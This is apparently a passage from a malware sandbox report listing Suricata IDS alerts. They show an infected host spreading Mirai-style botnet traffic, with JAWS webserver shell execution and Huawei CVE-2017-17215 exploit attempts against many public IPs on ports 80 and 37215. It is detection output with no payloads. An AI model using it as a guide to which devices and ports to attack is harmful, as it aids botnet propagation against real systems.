          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57510 -> 117.255.80.131:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37124 -> 52.147.152.231:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39452 -> 150.32.225.133:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37124 -> 52.147.152.231:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58206 -> 146.239.100.84:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46196 -> 59.87.238.43:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34760 -> 210.36.162.136:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46196 -> 59.87.238.43:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34760 -> 210.36.162.136:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52012 -> 101.26.29.84:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52012 -> 101.26.29.84:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35510 -> 19.67.64.37:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58206 -> 146.239.100.84:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35510 -> 19.67.64.37:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35534 -> 44.223.88.222:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35534 -> 44.223.88.222:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45496 -> 161.115.163.88:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37904 -> 208.170.5.222:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37904 -> 208.170.5.222:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52248 -> 182.205.184.220:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52248 -> 182.205.184.220:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38188 -> 41.7.124.25:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50606 -> 106.119.111.49:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35752 -> 112.106.103.207:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45994 -> 93.104.201.65:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50606 -> 106.119.111.49:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45994 -> 93.104.201.65:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56424 -> 145.20.17.13:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34848 -> 73.104.148.95:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34482 -> 64.69.46.207:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34848 -> 73.104.148.95:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34482 -> 64.69.46.207:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57504 -> 186.44.230.51:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57504 -> 186.44.230.51:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37786 -> 66.28.161.170:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33070 -> 116.198.57.17:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33070 -> 116.198.57.17:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35752 -> 112.106.103.207:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45530 -> 1.78.144.178:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53450 -> 197.166.40.133:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45530 -> 1.78.144.178:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55086 -> 2.233.134.116:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45042 -> 155.207.215.11:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37786 -> 66.28.161.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55086 -> 2.233.134.116:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44762 -> 201.157.7.217:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44762 -> 201.157.7.217:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45496 -> 161.115.163.88:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36864 -> 159.157.188.52:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36864 -> 159.157.188.52:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45042 -> 155.207.215.11:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59800 -> 111.131.4.87:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59800 -> 111.131.4.87:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41832 -> 192.18.96.173:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41618 -> 101.211.231.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41618 -> 101.211.231.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41832 -> 192.18.96.173:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33488 -> 125.111.75.105:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33488 -> 125.111.75.105:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48866 -> 49.132.127.254:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48866 -> 49.132.127.254:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48538 -> 57.247.150.105:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41006 -> 97.55.138.48:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48538 -> 57.247.150.105:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33352 -> 213.75.138.155:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33352 -> 213.75.138.155:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49884 -> 175.136.0.206:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55390 -> 103.104.235.120:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55390 -> 103.104.235.120:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41006 -> 97.55.138.48:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53464 -> 128.160.146.62:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53464 -> 128.160.146.62:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55198 -> 138.190.218.64:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55198 -> 138.190.218.64:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60176 -> 99.212.18.166:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60176 -> 99.212.18.166:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54072 -> 194.18.61.94:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55962 -> 76.165.243.2:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55962 -> 76.165.243.2:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49884 -> 175.136.0.206:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51268 -> 17.188.107.76:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51268 -> 17.188.107.76:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51820 -> 110.23.29.220:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51820 -> 110.23.29.220:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56048 -> 197.105.173.170:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37176 -> 1.252.247.68:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37176 -> 1.252.247.68:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49154 -> 107.229.45.191:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56914 -> 46.96.134.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56914 -> 46.96.134.251:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48116 -> 54.6.47.124:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48116 -> 54.6.47.124:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40132 -> 128.106.21.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40132 -> 128.106.21.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54072 -> 194.18.61.94:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40276 -> 8.43.2.155:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40276 -> 8.43.2.155:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60086 -> 176.10.51.162:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60086 -> 176.10.51.162:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44828 -> 13.37.13.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44828 -> 13.37.13.251:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49154 -> 107.229.45.191:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39196 -> 124.243.135.24:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39196 -> 124.243.135.24:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42840 -> 189.147.217.224:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42840 -> 189.147.217.224:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39612 -> 191.228.77.210:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39612 -> 191.228.77.210:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53260 -> 197.235.112.160:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59226 -> 116.216.114.6:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59226 -> 116.216.114.6:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35332 -> 174.196.88.173:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35332 -> 174.196.88.173:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40120 -> 131.59.130.94:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40120 -> 131.59.130.94:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38702 -> 180.60.94.132:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38702 -> 180.60.94.132:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39456 -> 156.146.98.24:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39456 -> 156.146.98.24:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59578 -> 179.140.51.217:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59578 -> 179.140.51.217:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54800 -> 89.137.176.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54800 -> 89.137.176.141:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35002 -> 197.81.175.206:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50676 -> 156.13.215.132:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56676 -> 197.199.137.232:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58022 -> 42.222.254.70:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58022 -> 42.222.254.70:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42992 -> 82.147.27.113:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48634 -> 156.210.38.127:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44256 -> 156.219.192.223:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59154 -> 208.52.232.31:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59154 -> 208.52.232.31:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53344 -> 156.100.250.170:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50762 -> 41.67.28.55:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42152 -> 60.178.102.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42152 -> 60.178.102.141:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42992 -> 82.147.27.113:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44398 -> 150.222.20.65:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44398 -> 150.222.20.65:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42236 -> 197.1.206.139:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46118 -> 197.98.23.17:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46118 -> 197.98.23.17:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33390 -> 166.205.84.52:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33390 -> 166.205.84.52:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53810 -> 2.126.27.220:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53810 -> 2.126.27.220:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53538 -> 100.53.164.49:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53538 -> 100.53.164.49:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52782 -> 19.2.6.115:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52782 -> 19.2.6.115:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36912 -> 148.28.111.157:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36912 -> 148.28.111.157:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47612 -> 210.159.47.47:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47612 -> 210.159.47.47:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37630 -> 156.127.117.248:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53894 -> 197.125.185.133:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60136 -> 156.138.215.210:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45572 -> 156.234.118.115:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41936 -> 66.167.139.239:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41936 -> 66.167.139.239:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44106 -> 211.28.212.81:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40734 -> 197.236.127.19:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44106 -> 211.28.212.81:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50260 -> 156.110.116.192:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44492 -> 178.212.220.26:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56618 -> 119.163.95.200:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44492 -> 178.212.220.26:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56618 -> 119.163.95.200:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46520 -> 63.186.73.228:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46520 -> 63.186.73.228:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55242 -> 197.199.156.6:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53846 -> 41.195.129.201:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55640 -> 41.48.156.167:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50414 -> 156.142.216.19:37215
